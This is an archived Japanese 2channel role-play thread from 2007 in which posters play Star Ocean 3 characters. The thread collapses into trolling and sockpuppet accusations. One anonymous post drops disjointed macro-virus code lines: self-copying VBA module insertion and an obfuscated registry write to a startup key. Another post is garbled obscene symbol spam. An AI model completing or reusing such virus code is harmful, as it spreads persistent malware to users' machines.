5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【SO3】参上!解凍マリア団【総合】

1 :以上、自作自演でした。:2007/10/09(火) 02:54:18
この部屋はかつてこの世界、
"エターナル・スフィア"を救い出した仲間達と名無しの雑談場所。
勿論、私達の仲間でなくとも、旅に関係した人ならば誰でもウェルカムよ。

私達の行動を讃えてゲームや小説、漫画なども出来たらしいわ。
これはゲームの紹介。
ttp://www.square-enix.co.jp/so3/
ttp://www.square-enix.co.jp/so3/dc/

それと前の部屋の紹介よ。
【3?】アルベル・ノックス【TalltheEndofTime?】
http://etc6.2ch.net/test/read.cgi/charaneta/1141217527/
【発明品】アルベルと愉快な仲間たち【特許出願中】
http://etc6.2ch.net/test/read.cgi/charaneta/1171466500/

◇ 混乱を防ぐ為にも名乗り出る時にはトリップをつけてね。
◇ 過激なセクハラ系質問はしない事。
◇ ここの雰囲気が乱れる様な発言はしないで。
  そういう発言があった場合も相手はしない様にしてちょうだい。

あとは名無しのみんなや仲間達のモラルに任せるわ。
それじゃ、はじめましょ。

2 :以上、自作自演でした。:2007/10/09(火) 02:54:51
うはw立っちまったぜw

3 :以上、自作自演でした。:2007/10/09(火) 03:01:30
3だー

4 :リーベル:2007/10/09(火) 03:48:46
俺こそ四番バッターにふさわしい。そう思わないか?

5 :以上、自作自演でした。 :2007/10/09(火) 05:52:30
十賢者とマリアって気が合いそうだな

6 :マリア・トレイター ◆sO6BaMariA :2007/10/09(火) 09:02:55
早速こっちの部屋にも顔を出してみたけど、
まずは前の部屋を終わらせてしまいましょ。

それと改めて言っておくけど、
新政府設立に向けて旧政府所属の星だとかに
改めて挨拶と案内をしていてね。
暫くはそう頻繁に来れないかも知れないわ。

>2
これで次の部屋については安泰ね。
とは言っても一難去った状態。
まだまだ安心は出来ないわ。

それより代行ありがとう。感謝してるわ。
つ ペスケラ
これは感謝の印よ。
一人で飲むなり大切な人と飲み交わすなりしてね。

それじゃ、今回はこれで失礼するわね。




7 :マリア・トレイター ◆sO6BaMariA :2007/10/10(水) 00:27:37
>3
おめでとう。
前の部屋ではお世話になったわね。
この部屋でもどうかお手柔らかにお願いするわ。

キミ達にも何かお酒を振舞いましょうか。
今はアンリ・サンセールしか無いんだけどね。
ここに置いておくから好きに飲んじゃって良いわよ。

次の目的地を調べている間に
随分と時間が過ぎてしまったらしいわね…。
ふぁ…… おやすみ。

8 :マリア・トレイター ◆sO6BaMariA :2007/10/11(木) 03:12:28
>4
それってクォークでって意味?
……そう。
確かに私はみんなの事を深く信頼してるわよ。
互いの信頼が無くして一組織が動くかしら。
ま、4番バッター頑張ってね。期待してるわよ。

9 :以上、自作自演でした。:2007/10/11(木) 06:39:05
チート使いまくりバグ利用しまくりのオレだけど
最近、不正対策も無いし処罰もされません。

しかも何故かエターナルスフィアからログアウトできません
つまり好き放題やっていいってことかな?

10 :以上、自作自演でした。:2007/10/12(金) 12:23:09
とうとう前スレおわたな
てか最後のノートン、お前は地球人じゃぬぇだろう
辞典嫁

11 :以上、自作自演でした。:2007/10/12(金) 13:47:23
イヤな終わり方だったな。
これから心機一転やっていこう!
フェイトの兄貴とマリア姐さんについていくよ。

12 :以上、自作自演でした。:2007/10/12(金) 17:14:36
超スレンダー

13 :以上、自作自演でした。:2007/10/12(金) 17:35:47
マリア・スレンダー

14 :【発明品】アルベルと愉快な仲間たち【特許出願中】(前スレ):2007/10/12(金) 20:21:12
ttp://www.23ch.info/test/read.cgi/charaneta/1171466500/
ttp://p2.chbox.jp/read.php?url=http://etc6.2ch.net/test/read.cgi/charaneta/1171466500/all
ttp://com-nika.osask.jp/bbs/bbs.php?http://etc6.2ch.net/test/read.cgi/charaneta/1171466500/

15 :ノートン ◆b/yNrE0IcM :2007/10/13(土) 03:43:08
さて原住民とコンタクトを取るとするかねぇーーー

>980 クリエイター「917」
おぉ・・・上出来だ!
あとは最後の仕上げだよな。
『銃を得意とするキャラも使用可能に改造すること』
分かったな?

ああそれと・・・クリエイターなら契約できるよなぁ。
珍しい金属を見せてやるから、今から契約な!

>>1-2
労働力程度にはなるか・・・よし。
そこのお前、オレ様の条例を書く看板を作ってくれないか?
なぁに・・・他の事は要求しないからよー

>>3
おっとまた現地人に遭遇か。
3か・・・3ねえ・・・・・ああ、暗号か。
とりあえずメモしておくか

>>4
何だお前?地球人か?ま、元気のいい奴は配下にすれば使えそうだな

>>5
なるほどぉ・・・ここのお嬢さんの名前はマリアっていうのか。
名前からして地球人だよなぁ。
いろいろとお世話になりそうだ

16 :以上、自作自演でした。:2007/10/13(土) 04:05:18
>>15
お前イラネ

17 :マリア・トレイター ◆sO6BaMariA :2007/10/13(土) 04:25:24
こんばんは。

>5
十賢者とねえ。
結局は故人だし実際にどうだかは分からないけど、
同じ兵器だという事は確かだわ。

でも彼らは兵器として作られた。
最初から破壊や支配を設定されて生まれているんでしょう。
私達は対人兵器では無かったし……
とにかく…彼らと私達は違う。

>6
残念だったわね。
キミは一生をここで過ごす事になるのよ。
と言ってもキミにとっては痛い事では無いか。

しかし処罰されないだなんて嬉しい事ね。
運営側から処罰されないと言うなら、
いっそ私があなたをBANしてあげましょうか?

18 :マリア・トレイター ◆sO6BaMariA :2007/10/13(土) 04:26:17
>977-978
豪快で陽気。
とても親しみ易い性格をしているし、
こう人気が出るのも別におかしな話では無いわね。

私もクリフの事は好きよ。
拾ってくれた時もとても優しく接してくれてね。
忘れたくない思い出の一つだわ。

>979
SO3で使われている私達の声なんだけど、
"私達の声の数値"を声優に被せる事で
本人に入れて貰う事無く私達が出演出来ちゃうのよね。
だから最新の技術で言っちゃえば声優より数値の問題。
私の声も数値も別のゲームとかアニメで使われてるみたいね。

>980
移動速度は必要無いわ。
こちらに来る前に始末してしまえば良いのよ。
そういう訳で私としては威力が欲しい所ね。

>981
私の戦闘法では足技も使うし結構鍛えたわね。
能力の事を知ってからは体力面の向上を図ったわ。
それにクラウストロへの滞在も珍しくなかったし……
ここで一番鍛えられたかも。

19 :マリア・トレイター ◆sO6BaMariA :2007/10/13(土) 04:27:02
>981 続き
……それと。
お褒め頂くのは嬉しいけど、
余計な事言わなくていいのよ。

>982
『ごくふつー』?
どう見てもレゼルブ星人です。本当にありがとう。

泊めて欲しいだなんて馬鹿言わないでよ。
初対面で素性も分からないような男性と誰が泊まるものですか。

……艦艇か。それなら構わないわよ。ちょっと待ってて。

―ディプロ、聞こえる?
―あれ?マリエッタじゃないのね?
―まぁクリフでも良いわ。これより2名の収容を願います。
―…うん。不時着したレゼルブ星人が居てね。ま、そういう事だから宜しく。

前の部屋は確かに残念な終わりをしたけど、
毎度上手く行くとは限らないから。

20 :以上、自作自演でした。:2007/10/13(土) 12:24:30
ソフィアの使えなさは異常

21 :リーベル:2007/10/13(土) 22:41:44
リーダー、秋と言えばDHC豊富の秋刀魚ですね。
大根おろしとポン酢をかけると異次元のうまさですよ。
さんまの名探偵

22 :クリエイター「917」:2007/10/13(土) 23:35:28
では「移動速度+30%」を「ATK+1000」に変えます
これを完成品としてギルドに送って登録してもらった後、お届けしますね

23 :ノートン ◆b/yNrE0IcM :2007/10/14(日) 03:30:40
へーイ原住民諸君!!!本日も登場しましたよ。
(言語は通じてるようなんで通信機の無事を確認、と)

>>9
羨ましいもんだね。オレなんか連邦に加盟してなくても
懲役600年以上だってのによー

塚、バグやチート使いまくりって事は電子マネーでも増やしたのか?
連邦の奴らの記録をいじるって相当な技術者だな。

やっぱずる賢い地球人の犯罪者は違うね!!!

>>10
かーーーーーー公言しちまったのかよ。

そうとも・・・オレはレゼルブ人よ!
なに、地球人っぽい姿があったんでね、
付け入る為に嘘ついてみたのよ。
平和な旅行者ぐらいだったら騙せただろ

>>11
ま、数字とか時空に関する事はどの種族も似たような感覚だから、
1000近くで人が殺到するのも当然だろうよ。

つうかフェイトって奴がいるのか!?
青い髪と眼をしたアイツもそんな名前だったよなぁ。
・・・・・・気になるぜ

24 :ノートン ◆b/yNrE0IcM :2007/10/14(日) 03:32:48
>>12-13
マリアスレンダーってここのお嬢さんのことだよな?
確かにいいスタイルしてるな。
その服・アクセサリーからして、
大方どっかの金持ちの子供か。

つう事は・・・誘拐するのもいいかもしれないな!
監視惑星にすらなってない様な場所だし、誰にも邪魔されないぜー

>>14
おぉ・・・コイツはサービスがいいね。
性能のいいAIがやってくれたのか?じゃ、チップもお礼も要らないよな

>>16
やっと出てきたかーーー反抗的な村人Aが。
上の連中が決めた法律にねぇ、
『私達の仲間でなくとも誰でもウェルカムよ』ってあったんでね、来ちゃいましたよ。
何、もっと娯楽の多い星でも見つけたら去りますんで、ご安心を。

>>19
けっ!レゼルブと分かるとはねーー。博識なお嬢さんだ。

ん?艦艇に泊めてくれるのか。
やっと自由になれ・・・じゃなくて、
ええと・・実はオレの船が壊れてしまいまして。
参考にしたいんで、そっちの動力部を見せてもらっても
構いませんかね?
へへッ

25 :マリア・トレイター ◆sO6BaMariA :2007/10/14(日) 16:23:53
こんばんは。
前回は私らしからぬミスをしたわ。
>6宛じゃなくて>9宛ね。

しかしレゼルブのあの男。
何やら引っ掛かるわね……。

ま、何かあってもクラウストロ人しか居ないディプロだし、
何とかなるでしょ。

>10
……正直言ってレゼルブ人への気持ちはあまり良いものでは無いわ。
快楽主義者で楽観的な者が多いと聞くし、
フェイトからもヴァンガード3号星で
悪事を働いていたレゼルブ人の事を聞いているから。
名前は…なんて言ったっけ……。ノー……トン?

>11
980なんて数で放置していたら
誰でも埋めたくなっちゃうんじゃないかしら?

そうね。部屋も変わった事だし
少し気持ちを入れ替えて頑張ろうかしら。
改めて宜しくお願いね。

>12
それって私に言ってくれてる訳?
ま、悪い気はしないわね。ありがとう。
でも超スレンダーって言うと骨と皮みたいだわ。

26 :マリア・トレイター ◆sO6BaMariA :2007/10/14(日) 16:25:14
>13
語感は悪くないわね。
でもスレンダーだなんて名乗るのはナルシストみたいで恥ずかしいわ。
私は自己紹介する機会が多いんだから。

>14
わざわざありがとう。
前の部屋を振り返りたくなったら見るとするわ。

>20
彼女は今まで戦闘の「せ」の字も体験していないのよ。
戦闘の経験が無くてアレなら上出来な方じゃない?

考えても見なさい。
クラウストロ人にファイトシミュレータ浸りのヒューマン、
未開惑星人とは言え正式な軍人。
こんな面子の中じゃ彼女が浮彫りになるのもおかしな事では無いわ。

悪いんだけど今回はこんな所でね。
今は一気に返す時間が無いの。

27 :以上、自作自演でした。:2007/10/14(日) 18:28:51
ノートンがマリアに親しみもつとか、かなり違和感あるキャラスレなんだけど。

28 :以上、自作自演でした。:2007/10/14(日) 21:23:25
これは「綺麗な」ノートンなんだよ

29 :以上、自作自演でした。:2007/10/14(日) 21:36:30
そんなジャイアンみたいなノリで言われても

30 :以上、自作自演でした。:2007/10/14(日) 22:00:14
武器おいときますよ。
つ【エターナルスフィア、シャープネス、魔剣レヴァンテイン】

31 :以上、自作自演でした。:2007/10/14(日) 23:34:33
マリアさんはロボットアニメは好きですか?

32 :以上、自作自演でした。:2007/10/14(日) 23:48:02
◆sO6BaMariAが素でキモイ件

33 :ノートン ◆b/yNrE0IcM :2007/10/15(月) 00:36:22
ヘイ今晩もノートン様が現れましたよォーー

>>20
かーーーーーーーーーーッ
言ってはならない駄目な言葉を言ったな!?

ソフィアっていう名前を出したら駄めだって事くらい
分からないと駄メだろうが!!!
その名前は連邦外の地域でも言ったら駄眼なんだよ。

・・・なんか通信機がおかしいか?

>>21
サンマねぇ・・・
地球の名産品と聞くが味の方はどうだかね。
だいたい肉なんか食って何が美味いんだか!
中の体液を吸うことが一番だろうよ?

しっかし地球人は生まれたときから体液を吸うっていうし
何でも食う種族だよな。

>>22
おいおい肝心なモノが抜けてないか?
FOL×10倍を付けて戦わないと生活できないだろ。

最近じゃ、地球連邦の軍人も武具を改造して
荒稼ぎしてるって噂だしよ。
もっとも、敵に殺されてばかりって話も聞くがねぇ。
ぎゃはははははは

34 :ノートン ◆b/yNrE0IcM :2007/10/15(月) 00:39:36
>>25
いえ俺はレゼルブ人の中でも
好き勝手やりすぎてない方だってよォーー

え?ヴァンガード3号星?
そんな遺跡しかなかった未開惑星は知らねぇなあ。

・・・ノートンってのは、たぶん別人だ。
ノートソの間違いだろ。
ほら、地球だって、マリオとかマリアとかアリマとか
似たような名前がたくさんあるだろ。

>>27
いやヒューマンタイプなら異星人にも興味もつだろ?

ま、バンデーンのような魚野郎とか
獣っぽさが残りまくりな種族とかには興味ねえけどよォ、
レゼルブも地球人もテトラジェネスも
綺麗なら何でもいいだろ。

35 :以上、自作自演でした。:2007/10/15(月) 00:42:45
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

36 :綾崎ハヤテ:2007/10/15(月) 08:13:46
マリアさん今日も綺麗です!

37 :マリア・トレイター ◆sO6BaMariA :2007/10/15(月) 08:56:47
おはよう。
>1には書き忘れてしまったけどsage進行でお願いしたいわ。
未だにフェイトやソフィアなんかの関係者を追い掛ける
メディアが居るぐらいだから少し気になるのよ。

>21
DocosahexaenoicAcid ね。
ここの名無しの多くが住んでいる
仮称"地球二号星"では良く食べられるそうよ。

……ねえ、リーベル。このディスクは何。
散々秋刀魚の話をしてたのに差し入れはディスクな訳?

>22
有難う。いざと言う時は使わせて貰うわね。
とは言っても最近は戦闘の機会も無いんだけど。
…ところで……お金は良いの?
こんな立派なものだし、大層な値になりそうだけど。

>24 ノートン
………。
別に構わないわ。
ただし御客人に案内者も付けないような
気の利かない組織だとは思われたくないし、案内を付けるわ。
ミラージュって女性に頼んでおくから。

今晩もう一度来れると良いんだけど…
それじゃ、またね。

38 :以上、自作自演でした。:2007/10/15(月) 13:36:44
マリアさん鍋は好きですか?
クォークで闇鍋しましょうよ

39 :以上、自作自演でした。:2007/10/15(月) 15:06:44
馴れ合いキモス

40 :以上、自作自演でした。:2007/10/15(月) 18:27:11
クォークってあれですよね、素粒子の一種の

41 :以上、自作自演でした。:2007/10/15(月) 18:51:38
なんかこのスレにコンプレックスのある人がいるみたいだね
マリアさんはコンプレックスとかある?

42 :以上、自作自演でした。:2007/10/15(月) 21:04:34
さて、地獄巡りの片道切符は
貴様らの命で買って貰うとするか...

43 :以上、自作自演でした。:2007/10/15(月) 21:23:49
>>41
マリア・トレイター ◆sO6BaMariA乙

44 :以上、自作自演でした。:2007/10/15(月) 22:29:51
攻撃の時、よくあんなに脚上がるね
しかもスカートだし

45 :以上、自作自演でした。:2007/10/15(月) 22:32:35
>>44
オタきめぇww

46 :以上、自作自演でした。:2007/10/15(月) 22:47:48
マリアの銃から出てくるものって結局なによ

47 :以上、自作自演でした。:2007/10/15(月) 23:06:24
>>46
ザーメソ

48 :以上、自作自演でした。:2007/10/15(月) 23:16:01
荒らしてるのノートンだろ

49 :以上、自作自演でした。:2007/10/15(月) 23:31:42
>48マリア名無しで乙

50 :以上、自作自演でした。:2007/10/15(月) 23:34:12
なにこの粘着

51 :以上、自作自演でした。:2007/10/15(月) 23:37:27
ほっとけ。
ってかフェイト来ねーな。

52 :以上、自作自演でした。:2007/10/16(火) 00:12:35
◆sO6BaMariAが必死だのお^^

53 :リーベル:2007/10/16(火) 00:14:35
なんか寝起きのリーダーの頭の様に混沌としているな…。

フェイトか…、奴は俺の最強のライバルだった男…。
奴が来なければ解凍マリア団の副団長は俺に決定だな!

54 :以上、自作自演でした。:2007/10/16(火) 00:44:21
こうゆう時こそネルかロジャーかアルベルが助けに来て欲しい・・・

55 :以上、自作自演でした。:2007/10/16(火) 01:01:33
そして敵の一撃食らって気絶か

56 :以上、自作自演でした。:2007/10/16(火) 01:09:15
>>53
ていうかキミがスレ仕切ってもいいよ

57 :以上、自作自演でした。:2007/10/16(火) 01:22:18
自演乙

58 :以上、自作自演でした。:2007/10/16(火) 02:11:08
いいかげんやめれ

59 :以上、自作自演でした。:2007/10/16(火) 08:10:25
必死だ言ってる人が一番必死な件
なんで俺がマリアなんだアフォか

60 :以上、自作自演でした。:2007/10/16(火) 08:15:45
おまえら落ち着け。自演とか根拠ないこと言うなよ
あと>>1をもう一度読め

61 :以上、自作自演でした。:2007/10/16(火) 09:58:54
>>57-60=名無しのマリア

62 :マリア・トレイター ◆sO6BaMariA :2007/10/16(火) 10:45:48
落ち着くまで様子見しようかと思ってたけど、
良く考えたらこの人達は私が鬱陶しいだけみたいね。
フェイトはこの部屋になってまだ一度も来てないから兎も角として、
頻繁に来てくれていたノートンには噛み付いていないみたいだし。

私がここから立ち去るという簡単な事で済むなら構わないわ。
私はここで降りるから。
今まで応援してくれていた人達には本当に申し訳無いけどね。

ホント、なんでこんな事になったんだかね。
私に悪い所が有ったのなら指摘して貰いたかったわ。

それじゃあね。

63 :以上、自作自演でした。:2007/10/16(火) 10:52:15
ばいば〜い
独占厨はもう二度と来ないでね

64 :以上、自作自演でした。:2007/10/16(火) 11:11:02
ちょっと待って!俺はマリアが鬱陶しいなんて思ってないぞ!
戻って来て!

65 :以上、自作自演でした。:2007/10/16(火) 11:14:49
それいうと自演乙って言われるぞw

質問だが 独占厨潰したって事は新マリア来る確信あるの?

66 :以上、自作自演でした。:2007/10/16(火) 11:50:36
64 名前:以上、自作自演でした。 投稿日:2007/10/16(火) 11:11:02
ちょっと待って!俺はマリアが鬱陶しいなんて思ってないぞ!
戻って来て!

↑見苦しいよwww

67 :以上、自作自演でした。:2007/10/16(火) 12:19:05
酷いな…

68 :以上、自作自演でした。:2007/10/16(火) 12:47:40
ちょっと待ってww俺はマリアが鬱陶しいなんて思ってないぞwwww
戻って来てwwwwwwwwww


69 :以上、自作自演でした。:2007/10/16(火) 12:50:57
あーあ…。
マリアはノートンが荒らしだって思ってるようにもみえるな。
荒らしなんか放っておけばいいのに。

70 :以上、自作自演でした。:2007/10/16(火) 12:55:02
わざわざこんな過疎スレに粘着するなんて
すっかり人格が歪みきってる…
これは相当病んでるな
テラカワイソス

71 :以上、自作自演でした。:2007/10/16(火) 12:58:44
>>69
思ってたとしても仕方なくね
ノートンage進行だったし荒れ始めたのノートン来たあたりからだし

72 :以上、自作自演でした。:2007/10/16(火) 13:06:44
つまりageすぎた結果がこれか。

73 :以上、自作自演でした。:2007/10/16(火) 13:15:24
>>69-72
マリア未練がましいよマリア

74 :以上、自作自演でした。:2007/10/16(火) 13:16:56
このスレ荒らす理由が全く見つからないよな

75 :以上、自作自演でした。:2007/10/16(火) 13:22:51
ノートン邪魔

76 :以上、自作自演でした。:2007/10/16(火) 13:28:13
ノートンも来なくなったな
違うなら出て来て欲しいもんだが

77 :以上、自作自演でした。:2007/10/16(火) 13:28:51
ネルスレに巣くっていたノートンが名無しを集めるため。
または地味に人気のあったマリアに嫉妬。
ノートンじゃなかったらノートンに申し訳ないが
疑われるのは仕方ないな。

78 :以上、自作自演でした。:2007/10/16(火) 13:31:12
ネルスレに居た頃はsage進行だったしな
確かに仕方ないかもわからん

79 :以上、自作自演でした。:2007/10/16(火) 13:33:42
あ、◆sO6BaMariAが暴れてる

80 :以上、自作自演でした。:2007/10/16(火) 13:34:18
こういうのって同ジャンルでも越境になる?

81 :以上、自作自演でした。:2007/10/16(火) 13:42:21
ノートン=荒らしを兼ねた構ってちゃんだな。
個人スレのネルスレを引っ掻き回して今度はこっちか。
巡回スレが一つなくなって寂しいよ。


82 :以上、自作自演でした。:2007/10/16(火) 13:51:39
お前らノートンのせいにするな。
彼は優秀なキャラハンだ。

83 :以上、自作自演でした。:2007/10/16(火) 13:54:32
腕は良かったとおもうが疑われても仕方なかったとおもうよ

84 :以上、自作自演でした。:2007/10/16(火) 13:58:07
>>80
わからんけどなるんじゃね

85 :以上、自作自演でした。:2007/10/16(火) 14:30:23
>82
ノートン乙w

86 :以上、自作自演でした。:2007/10/16(火) 14:44:03
マリアもノートンが来た時点で嫌な予感はしてたろうな。
自スレで似たようなことあったからわかる。

87 :以上、自作自演でした。:2007/10/16(火) 14:48:15
マリアの自己擁護はつつく

88 :以上、自作自演でした。:2007/10/16(火) 14:53:15
つつく

89 :以上、自作自演でした。:2007/10/16(火) 15:50:03
落ち着いてから戻ってくる可能性もある

90 ::2007/10/16(火) 15:58:50
pgr

91 :以上、自作自演でした。:2007/10/16(火) 16:47:14
来ないと思うな。
乗り気じゃなかったのをフェイトが来たから続行したんだし。

92 :以上、自作自演でした。:2007/10/16(火) 16:48:33
まぁ荒らしが消えないことにはどうにもならんな

93 :以上、自作自演でした。:2007/10/16(火) 16:56:21
>>91
フエイトくる前に意向はかえてた気ガス

94 :以上、自作自演でした。:2007/10/16(火) 17:06:22
>>93
そうだっけ。
フェイトが「自分も参加するから辞めないでくれ」
って感じだった気がしたんだけど記憶違いだったかな。

95 :以上、自作自演でした。:2007/10/16(火) 17:10:36
>>94
前スレ>>14

名無しがやめないで系のレスしたらマリアが考え直した
フェイトはその直後だった

96 :以上、自作自演でした。:2007/10/16(火) 17:20:41
まぁ精神を病んでるのがいるのはみんなわかってたんだろうけど
こうして荒れてしまったし、相手の思うツボだったか

しかし、普通にレス返す=独占ってw
釣られずにはいられないw

97 :以上、自作自演でした。:2007/10/16(火) 17:24:57
というかこの荒らし絶対VPの方のスレにも沸いてたヤツだろw

98 :以上、自作自演でした。:2007/10/16(火) 17:28:16
まぁもうこのスレ下げていこうぜ…
またいつか再利用するやつもいるかもだし

99 :以上、自作自演でした。:2007/10/16(火) 17:28:53
止めないで系レスっていうか一人じゃ続けられないって
マリアが言ったからフェイトが来てくれたんじゃなかったっけ

つかノートンみたいな場違いなキャラは個スレ立てて一人でやれよ
ネルのスレもおんなじように荒らして次はマリアのスレかよ

100 :以上、自作自演でした。:2007/10/16(火) 17:33:27
戻って来てくれる気がする
引退宣言は荒らしを消す口実とかで

101 :以上、自作自演でした。:2007/10/16(火) 17:37:59
>>99
ノートンは始めから荒らしです。

102 :以上、自作自演でした。:2007/10/16(火) 17:58:35
マリア潜伏中

103 :以上、自作自演でした。:2007/10/16(火) 18:57:51
助けてアノレベノレ!

104 :以上、自作自演でした。:2007/10/16(火) 21:18:18
あれ?マリアいなくなったの?・・・・何だかものすごい脱力感が出たんだが・・
何か荒らし死ねって本気で思った・・せっかくマリアが続けてくれると言ってくれたのに・・

ため息が止まらないよ

ところで・・「OH!マイベイビー」ってやつでマリアを見つけたんだが

105 :以上、自作自演でした。:2007/10/16(火) 21:36:40
マリアも戻りたいだろうな

106 :クリエイター「917」:2007/10/16(火) 22:06:41
マリアさんがいなくなってションボリ状態だね・・
ギルド関係の人に代理ってことで頼もうと思うけど・・どうかな?
とりあえずウェルチさんを呼ぼうかと

107 :以上、自作自演でした。:2007/10/16(火) 22:10:29
呼んじゃえ呼んじゃえ

108 :以上、自作自演でした。:2007/10/16(火) 22:12:30
>>103
アレもage進行だしオリキャラみたいなもんだしよけい危なくね

109 :ウェルチ・ビンヤード ◆d.c4rrKel6 :2007/10/16(火) 23:20:14
どうも初めましてこんばんわ
職人ギルドの受け付け 兼 ギルドマスターの秘書 兼 各地に点在するクリエイターとの連絡係を勤めている
ウェルチ・ビンヤードと申します

「917」君からの通信をもらって早速書き込みに来ました
早速活動を開始・・したいところなんですがぁ、今日は疲れが溜まっていて眠いんですよぉ・・(うとうと)
明日もギルドの仕事がありますし・・すみませんが睡眠を取らせてもらいますね

返事とかは明日にでも返しますね。 ではおやすみなさい

110 :以上、自作自演でした。:2007/10/16(火) 23:21:21
もうバジルでいいよ

111 :以上、自作自演でした。:2007/10/16(火) 23:31:23
>>104-106
マリア、乙!

112 :以上、自作自演でした。:2007/10/16(火) 23:43:54
ウェルチさんは実は凶暴なんですよね!

113 :ウェルチ・ビンヤード ◆d.c4rrKel6 :2007/10/17(水) 08:16:01
ギルドの受付でノートパソコン開いて書き込みに来ました! 早速返事を返しますね

>>110
バジルってロセッティ−座のピエロさんのことですよね?
あの人はサーカスとかで忙しいから無理だと思いますよ(私はすごくヒマだけど)

>>112
凶暴って言わないでくださいよ!確かにギルドマスターに体当たりとかしたことはありますけど・・
でも女性に対して失礼な言葉です! 今度からは言わないでください!

あと、昨日は言い忘れていましたけど私はマリアさんが戻ってくるまでの間の代理です
なので、仮にマリアさんが戻ってきたらすぐにいなくなっちゃいますが、そこは了解してくださいね

114 :以上、自作自演でした。:2007/10/17(水) 09:11:25
ギルドマスターに優しくしてあげて下さい。

115 :以上、自作自演でした。:2007/10/17(水) 10:16:00
じつは、◆sO6BaMariAと掛け持ちだったりして・・・<ウェル地

116 :以上、自作自演でした。:2007/10/17(水) 11:23:25
まだ粘着してるのか

117 :以上、自作自演でした。:2007/10/17(水) 11:29:32
ノートンも全角で・みっつだったね

118 :以上、自作自演でした。:2007/10/17(水) 12:38:48
>>116-117
まだいたのかマリア

119 :以上、自作自演でした。:2007/10/17(水) 13:16:26
純粋にいつまでも粘着する理由が知りたくなって来るな

120 :以上、自作自演でした。:2007/10/17(水) 13:52:22
暇なんだろ
昨日も朝から晩まで張り付いてたしなw

121 :以上、自作自演でした。:2007/10/17(水) 15:41:22
>>119-120

122 :ウェルチ・ビンヤード ◆d.c4rrKel6 :2007/10/17(水) 17:54:38
>>114
これでもギルドマスターには優しく接しているんですけどね
他人から見れば貴族メンをいじめてるように見えるんですか?

>>115
正直に答えましょう!別人です・・信じてもらえるかはわかりませんけどね
それと、私の名前は「ウェルチ」です 「ウェル地」じゃありません!

>>116 >>117 >>119 >>120
粘着している人もそうですけど、反応するのも相手の思う壺だと思いますよ?
そうなるといつまでもマリアさんは戻ってきませんよ? 私の仕事も増える一方ですけど

>>118 >>121
そこの貴方も!すぐにマリアさん(の中の人)と決め付けるのも変ですよ

123 :以上、自作自演でした。:2007/10/17(水) 18:53:29
決め付けてんのはお前のほうだろ素出し野郎

124 :以上、自作自演でした。:2007/10/17(水) 19:04:13
荒らししつこ
マジで朝から晩まで張り付いてるのな

125 :以上、自作自演でした。:2007/10/17(水) 20:00:58
俺もうここ来るの止めようかな
マリアさんが来れない時代わりに来たりもしたけど
此処まで粘着されるともう見るに耐えない

126 :以上、自作自演でした。:2007/10/17(水) 20:11:20
確かにこれじゃすぐには戻れないだろうな
相手が朝から晩まで毎日張り付いてる暇人じゃあね
暫く外部にでも行って落ち着いた頃に戻るという手段なら
まぁあるはあるが

127 :以上、自作自演でした。:2007/10/17(水) 20:50:36
ノートン(仮)はなにが気に入らないんだろうな。
こんな気色悪い奴と会ったのは二回目だ。
マリアが外部でやるって言うなら見に行く。ウェルチもそっちで会おうよ。

128 :以上、自作自演でした。:2007/10/17(水) 20:52:16
>124-127マリアしつこっ!

129 :ウェルチ・ビンヤード ◆d.c4rrKel6 :2007/10/17(水) 21:08:58
せっかく皆さんとお話できると思ってたのですが・・残念です

たった1日間しかいれませんでしたが・・皆さんお疲れ様でした
また合えることを楽しみにしていますね

130 :以上、自作自演でした。:2007/10/17(水) 21:13:44
バイビー

131 :以上、自作自演でした。:2007/10/17(水) 21:47:40
外部というと太陽ぐらいしか思い浮かばん
ちなみに太陽にはSO3総合ある

132 :以上、自作自演でした。:2007/10/17(水) 21:54:41
いっそネルスレいくか!

133 :以上、自作自演でした。:2007/10/17(水) 21:58:19
㊪㊚㋩㋒㋜ で 乜勹〰スㄜㄝㄋ〰 ♥
㊛㋨ ぉっゅㄡㄦㄡㄦ 〲ヷヷ〰〰♥♥♥
ⓞⓜⓐⓝⓚⓞ㍁ 〱ㄝ〰〰〰☠☠ (╬´^ิu^ิ`)ゔ〲〲
ゔゔゔ ァㄅㄨ 〲ゑヷ〰〰〰 ゔゔゔゔゔ〰〰♥♥♥♥
ㄡヶㄦ〰〰 ㄡヶㄦ〰〰 ㍅㊪㊚・・・ ┣¨㌱┣¨㌱ (¿^ิ౪^ิ)
㋙㋶〰 ㊪㊚㌥㌝〰 (╬☉♊☉)

134 :以上、自作自演でした。:2007/10/17(水) 23:30:37
お前らこのスレで何がしたいの?w
自治厨気取りたいのか、ただキャラハン潰したいのか


135 :以上、自作自演でした。:2007/10/17(水) 23:30:55
粘着キメェw^^
一日中スレに張り付いてるニートは職探せよ^^

136 :以上、自作自演でした。:2007/10/17(水) 23:43:50
>>134-135

137 :以上、自作自演でした。:2007/10/18(木) 00:01:07
こいつの書き込み見てるとマジで朝から晩まで居るのな
やばくないか

138 :以上、自作自演でした。:2007/10/18(木) 00:18:23
頭の可哀想な人が粘着してると聞いて飛んできました

139 :ノートン ◆b/yNrE0IcM :2007/10/18(木) 00:58:48
おぉ?マリアっていう地球人のこと怒らせちまったか?
つうか俺も、銃で撃たれるは鉄パイプで殴られまくるはなんで

Л゜これでかんべんしてください;; 
           
           つ『預
             言
             書1〜16』

いろいろなひとにめいわくをかけてごめ
んなさいはんせいはじまりげつようから
かきこんでませんあらしのいとはありま
せんあげてかいたのはかそすれとかんが
えたからですのーとんなのはこんなので
もいればふぇいととかがきがねなくさん
かできるとおもったからですばちがいで
ごめんなさいねるすれはせくしつがおお
かったのでふんいきをかえようとおもい
ましたよけいなことでごめんなさいほし
ゅのつもりでもありましたさいごにまり
あしへあらしはたいしょうはかんがえて
ないとおもうのでどうかきにせずふっき
してくれるとたいへんたすかりますとり
あえずうぇるちしとかとほしゅのいみで
つづけたいですあとはななしのいけんを

140 :以上、自作自演でした。:2007/10/18(木) 01:04:34
激しく読み難いんだよバカヤロー

141 :以上、自作自演でした。:2007/10/18(木) 05:36:12
